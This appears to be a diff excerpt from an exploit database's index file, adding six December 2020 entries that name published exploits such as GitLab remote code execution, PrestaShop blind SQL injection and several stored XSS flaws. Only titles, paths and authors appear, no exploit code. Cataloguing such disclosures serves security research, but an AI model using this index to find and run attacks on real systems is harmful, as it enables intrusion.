41859,exploits/php/webapps/41859.txt,"FAQ Script 3.1.3 - 'category_id' SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
|
41859,exploits/php/webapps/41859.txt,"FAQ Script 3.1.3 - 'category_id' SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
|
||||||
|
@ -43481,3 +43481,9 @@ id,file,description,date,author,type,platform,port
|
||||||
49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
|
49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
|
||||||
49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
|
49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
|
||||||
49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
|
49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
|
||||||
|
49263,exploits/ruby/webapps/49263.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated)",2020-12-16,"Mohin Paramasivam",webapps,ruby,
|
||||||
|
49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php,
|
||||||
|
49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux,
|
||||||
|
49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,
|
||||||
|
49267,exploits/php/webapps/49267.txt,"PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection",2020-12-16,"Frederic ADAM",webapps,php,
|
||||||
|
49268,exploits/php/webapps/49268.txt,"Seotoaster 3.2.0 - Stored XSS on Edit page properties",2020-12-16,"Hardik Solanki",webapps,php,
|
||||||
|
|